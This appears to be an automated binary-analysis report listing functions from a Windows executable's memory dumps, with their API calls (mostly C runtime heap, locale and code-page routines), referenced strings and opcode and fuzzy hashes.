API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
String ID: ~`|+
API String ID: 2755674607-3443854377
Opcode ID: 76dafbc25849430d96623b1bb9b11925fdda1e32bb2663052ac84e76c01afc9b
Instruction ID: e013677dcd3072137bb7ae89bfc9427e2c55341cb3d342f112e62d9a3c1a38f2
Opcode Fuzzy Hash: 76dafbc25849430d96623b1bb9b11925fdda1e32bb2663052ac84e76c01afc9b
Instruction Fuzzy Hash: 4A510170E01614CFDB10DF18E981ABEB7B4EF08314F15816EE809A7352EB38B955CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0045F142, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00460DF4: RtlAllocateHeap.NTDLL(00000000,?,00000010,?,00495EEF,?,004F5494,?,004844C1,?,00000010,?,004F5494), ref: 00460E26

_free.LIBCMT ref: 0045F251
_free.LIBCMT ref: 0045F268
_free.LIBCMT ref: 0045F285
_free.LIBCMT ref: 0045F2A0
_free.LIBCMT ref: 0045F2B7

Strings

QE, xrefs: 0045F2F7, 0045F14B, 0045F30C
~`|+, xrefs: 0045F2E8

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID: QE$~`|+
API String ID: 3033488037-2574442623
Opcode ID: a7441c38cbea4d24d45950aaec7b01b064997fefd87659b2e8e0c1656c3f32d8
Instruction ID: 8dda4e0ccdfe149850b807459879f11a52cb318cf2abe2a6dc78e1adb5d54b7e
Opcode Fuzzy Hash: a7441c38cbea4d24d45950aaec7b01b064997fefd87659b2e8e0c1656c3f32d8
Instruction Fuzzy Hash: 0651DE72A00604AFDB20DF69C841B6B77F4EF48325F14056EEC49D7292E739E909CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 004346D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124sleepfileCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000003E8), ref: 00434732
GetExitCodeProcess.KERNELBASE(?,?), ref: 0043473E
ReadFile.KERNELBASE(?,?,00001FFF,?,00000000), ref: 0043475F
Sleep.KERNELBASE(000003E8), ref: 00434782
GetExitCodeProcess.KERNELBASE(?,00000103), ref: 0043478B

Strings

~`|+, xrefs: 004347E4

Memory Dump Source

Source File: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeExitProcessSleep$FileRead
String ID: ~`|+
API String ID: 2157745630-3443854377
Opcode ID: 58898aeb7b54b038ddf81b870d9a2b7f970d87a6dfb611379c955b3607b90dce
Instruction ID: fab78ebaa26660d4248162994cde63fb7a26543b2305c3662f8d0e2d818d5275
Opcode Fuzzy Hash: 58898aeb7b54b038ddf81b870d9a2b7f970d87a6dfb611379c955b3607b90dce
Instruction Fuzzy Hash: A941AF31800255EFDF118FA4CC48BEEBF75FF8A311F241099FA95AA295C775A901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00429820, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00429931

Part of subcall function 004507BA: RaiseException.KERNEL32(E06D7363,00000001,00000003,EH,?,?,?,0048450D,?,004ECD68,?,?,004F5494), ref: 0045081A

Strings

ios_base::failbit set, xrefs: 00429861
ios_base::eofbit set, xrefs: 00429866
ios_base::badbit set, xrefs: 00429857, 00429882, 004298B1
~`|+, xrefs: 004298B3

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionInitRaisestd::locale::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$~`|+
API String ID: 2020603122-1022383732
Opcode ID: daa3755fabb3842f34655c6b231c28c1bb9a3eb760633eabfdf403e9a8c32ef4
Instruction ID: f029db22aa9fd2e6003f2f014f7663861094ed39727786f049b4c47f0fb7c6f0
Opcode Fuzzy Hash: daa3755fabb3842f34655c6b231c28c1bb9a3eb760633eabfdf403e9a8c32ef4
Instruction Fuzzy Hash: 3A3137B1A04704BBE710DF65D806B96B7E4FB04714F04462EE8144B6C1E7BAA858CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00464A02, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 00464BB8

Part of subcall function 00460DF4: RtlAllocateHeap.NTDLL(00000000,?,00000010,?,00495EEF,?,004F5494,?,004844C1,?,00000010,?,004F5494), ref: 00460E26

__freea.LIBCMT ref: 00464BC1
__freea.LIBCMT ref: 00464BE4

Strings

~`|+, xrefs: 00464A09

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$AllocateHeap
String ID: ~`|+
API String ID: 2243444508-3443854377
Opcode ID: 05d29230a9a5685e838eea63e7d7871e5780b717ab6352f0568967a6a392c4ee
Instruction ID: e4de6008bf020466fbd59466b02247dc404630eb3ac890dfb40c3f5b26611388
Opcode Fuzzy Hash: 05d29230a9a5685e838eea63e7d7871e5780b717ab6352f0568967a6a392c4ee
Instruction Fuzzy Hash: CA51D072500216AFEF259FA5CC41FBB36A9EF80B14F15016AFD0497241FB38ED5186AA

Uniqueness

Uniqueness Score: -1.00%

Function 00428EB0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00428EDB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00428F2A

Part of subcall function 0044D924: _Yarn.LIBCPMT ref: 0044D943
Part of subcall function 0044D924: _Yarn.LIBCPMT ref: 0044D967

Strings

bad locale name, xrefs: 00428F46
~`|+, xrefs: 00428EC3

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$~`|+
API String ID: 1908188788-2663600321
Opcode ID: aaa959f58cbdf4e5e5a4e91a60f057991a270c9d1c5578ac7544f4ae2929fe27
Instruction ID: 48b4919f4db8c12dbceb482f61ae3dfc1f8cb375ebd0112dd62e208be05e6224
Opcode Fuzzy Hash: aaa959f58cbdf4e5e5a4e91a60f057991a270c9d1c5578ac7544f4ae2929fe27
Instruction Fuzzy Hash: 5611B4B19047409FE320CF69D801B57BBE8EF19710F004A6FE899C3B41DBB8A904CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00466C6B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 004667FA: GetOEMCP.KERNEL32(00000000,00466A6C,?,00000000,0045BF6A,0045BF6A,00000000,00000000,?), ref: 00466825

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,00466AB3,00000000,00000000,?,?,00000000,?,?,?,0045BF6A), ref: 00466CC9
GetCPInfo.KERNEL32(00000000,00466AB3,?,?,00466AB3,00000000,00000000,?,?,00000000,?,?,?,0045BF6A,00000000,00000000), ref: 00466D0B

Strings

~`|+, xrefs: 00466C73

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID: ~`|+
API String ID: 546120528-3443854377
Opcode ID: c6d38c250c4fc756c8069c800719a414321985b0ff33000c2a71265cdf713a75
Instruction ID: 56c920efa24b60d219b5dbf2138659266e58050a8efc32211b6fddef42bd1c51
Opcode Fuzzy Hash: c6d38c250c4fc756c8069c800719a414321985b0ff33000c2a71265cdf713a75
Instruction Fuzzy Hash: 3D511170A003459FDB218F76C8406BBBBF5EF91304F16446FD0968B251F63DA946CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004668D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 00466902

Strings

, xrefs: 00466947
~`|+, xrefs: 004668DB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $~`|+
API String ID: 1807457897-1848573540
Opcode ID: 3791f330711616f279f0e8bfef2cb30e7f1e2195fc908fd29c41eeb096a3ff9b
Instruction ID: e4b485486c3a18fdfbfa6247a42d1613677e29d9b8a7faff26d174e48ee2426d
Opcode Fuzzy Hash: 3791f330711616f279f0e8bfef2cb30e7f1e2195fc908fd29c41eeb096a3ff9b
Instruction Fuzzy Hash: 5C417EB05042889BDB218B59CD84BF77BFDEB55308F2404AEE5CAD7142E2389D49CB16

Uniqueness

Uniqueness Score: -1.00%

Function 004298A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

ios_base::badbit set, xrefs: 00429857, 00429882, 004298B1
~`|+, xrefs: 004298B3

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Initstd::locale::_
String ID: ios_base::badbit set$~`|+
API String ID: 1620887387-2428214437
Opcode ID: d1cf4bcadff41e9cb693d34e6d5a70c52370c5b76d7ac9b48d26ba173a9766be
Instruction ID: fd7d16d949fed8479651190401e12ee359bbbb1797e973cc25046406daa6a189
Opcode Fuzzy Hash: d1cf4bcadff41e9cb693d34e6d5a70c52370c5b76d7ac9b48d26ba173a9766be
Instruction Fuzzy Hash: BD1179B1A40B05ABE300CF56C805746BBE4FB04718F10432EE8144BA80E7BAB568CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00463B30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

LCMapStringEx.KERNELBASE(?,00464AEE,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00463B64
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00464AEE,?,?,00000000,?,00000000), ref: 00463B82

Strings

JF, xrefs: 00463B41

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID: JF
API String ID: 2568140703-1897453494
Opcode ID: aa810f47456576ad55aa5fac35dc0f4e3d516b1e1a2c08efbb1cee8344e1e9d1
Instruction ID: 38cc30761d745d19a4df6c6ff4cc06ee9d603810636ed12ac32f6e3ce207ce37
Opcode Fuzzy Hash: aa810f47456576ad55aa5fac35dc0f4e3d516b1e1a2c08efbb1cee8344e1e9d1
Instruction Fuzzy Hash: D4F0CA3240015ABBCF126F90DC04DDE3F26FF08762F058126FA1865121DB36DA31EB89

Uniqueness

Uniqueness Score: -1.00%

Function 0045C756, Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

_free.LIBCMT ref: 0045C805
_free.LIBCMT ref: 0045C833
_free.LIBCMT ref: 0045C87B

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: fe89122929bee561d2e00eaf20754a04705129028f5ac18f5fd65cc9ae5728ea
Instruction ID: e2bb63f3d110a622e52d5a6fb70f0f1ac8aef72a2139629b6656910d1e95beda
Opcode Fuzzy Hash: fe89122929bee561d2e00eaf20754a04705129028f5ac18f5fd65cc9ae5728ea
Instruction Fuzzy Hash: B0418E316002059FDB64DFACC8C1A6AB3E9EF4935AB24456EE805C7392E735EC14DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045C8BA, Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0045C8E6
__cftoe.LIBCMT ref: 0045C918
_free.LIBCMT ref: 0045C93E

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: bc600eb3f4535ce4f81ff1111d5d27c106413f363fd8f0747ca6b5781f1ce4bc
Instruction ID: 66c143ba374f73ce3d9060948357c83b0bdc701f0f3c1308d849d5b34c89eda6
Opcode Fuzzy Hash: bc600eb3f4535ce4f81ff1111d5d27c106413f363fd8f0747ca6b5781f1ce4bc
Instruction Fuzzy Hash: 310148B3104304BDCF34225A9C86E9F2A59DBC1B76F24411BFC19D52E3DE38C90891AA

Uniqueness

Uniqueness Score: -1.00%

Function 00466EB0, Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00466EB4
_free.LIBCMT ref: 00466EED
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00466EF4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 5b670f55924fa4d3c3c6838b1cd56ea921eea7c383b10d2241aaa23dc893970b
Instruction ID: fdbcf5a682fb461e12bffc5401887114ee98182a2effb28825083c345ac01557
Opcode Fuzzy Hash: 5b670f55924fa4d3c3c6838b1cd56ea921eea7c383b10d2241aaa23dc893970b
Instruction Fuzzy Hash: C3E09B7B50461277A621327EFC499AB1919DFC1775726032BF52452282FE2A4C0280AB

Uniqueness

Uniqueness Score: -1.00%

Function 004373C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,00000002), ref: 004373F3

Strings

~`|+, xrefs: 004373CC

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Startup
String ID: ~`|+
API String ID: 724789610-3443854377
Opcode ID: a294ddeaa3b034585aeddf5ef8842f4667ceda3d6d424fb19738c19c90020686
Instruction ID: fa34ffeb3a4050d3032d6c6c982a27eaa33692bd016a125a9840b8de71a9cf88
Opcode Fuzzy Hash: a294ddeaa3b034585aeddf5ef8842f4667ceda3d6d424fb19738c19c90020686
Instruction Fuzzy Hash: 25E092319142084FD360EB28DE567B673D8EB4A325F40053A9A99C62D0EE396911CBCB

Uniqueness

Uniqueness Score: -1.00%

Function 00466A51, Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 004667FA: GetOEMCP.KERNEL32(00000000,00466A6C,?,00000000,0045BF6A,0045BF6A,00000000,00000000,?), ref: 00466825

_free.LIBCMT ref: 00466AC9

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 086f4a4e5e3884bcf50613b07c68e0eb02a87a8091048f98286e65af4ad07473
Instruction ID: 3b2e678ae46f09f25ba80718750cea95714b4d6aaa3497ed43f09578a84b26fe
Opcode Fuzzy Hash: 086f4a4e5e3884bcf50613b07c68e0eb02a87a8091048f98286e65af4ad07473
Instruction Fuzzy Hash: 6631C171900249AFCB01DFA9D840A9F7BB5FF41314F16406BF811A7291FB39AD54CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0044E6FC, Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00429936,?,0044D9C9,0044DA10,?,0044D856,00000000,00000000,00000000,00000004,00429936,00000001), ref: 0044E70F
IsProcessorFeaturePresent.KERNEL32(00000017,0044D1A5,?), ref: 0045C6D3

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodeFeaturePointerPresentProcessor
String ID:
API String ID: 4030241255-0
Opcode ID: 18403a342bdf9552844a2af3f2ab3efb0cb017c86d504e31370e31e02a73d202
Instruction ID: 8eadf9df2fea9ba7d26ff75ca80b287ee10a69fe3191c64021a840df6856eff5
Opcode Fuzzy Hash: 18403a342bdf9552844a2af3f2ab3efb0cb017c86d504e31370e31e02a73d202
Instruction Fuzzy Hash: 09F05471148306AEEB147F65BC4BB273A586B9470AF04003AFF0C941E3EF694969C55D

Uniqueness

Uniqueness Score: -1.00%

Function 0046710E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 004626C2: RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,00460CFB,00000001,00000364,00000002,000000FF,?,00459A98,00495F09,004F5494,?,004844C1,?), ref: 00462703

_free.LIBCMT ref: 0046717D

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 560a72f257b872d443f2a1465521a13d916d5b8a2ec260070b0e21be879b8b61
Instruction ID: 4568f6fe143bdb9fe49de0a3ec0741836640fee4556db1551945cb3ddb22e7fa
Opcode Fuzzy Hash: 560a72f257b872d443f2a1465521a13d916d5b8a2ec260070b0e21be879b8b61
Instruction Fuzzy Hash: 650126726043166BC3219FA9D8819DAFB98EB06374F10062FE945A77C0E7746D10C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0045E7EB, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 004626C2: RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,00460CFB,00000001,00000364,00000002,000000FF,?,00459A98,00495F09,004F5494,?,004844C1,?), ref: 00462703

_free.LIBCMT ref: 0045E80B

Part of subcall function 00460DBA: HeapFree.KERNEL32(00000000,00000000,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?), ref: 00460DD0
Part of subcall function 00460DBA: GetLastError.KERNEL32(?,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?,?), ref: 00460DE2

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
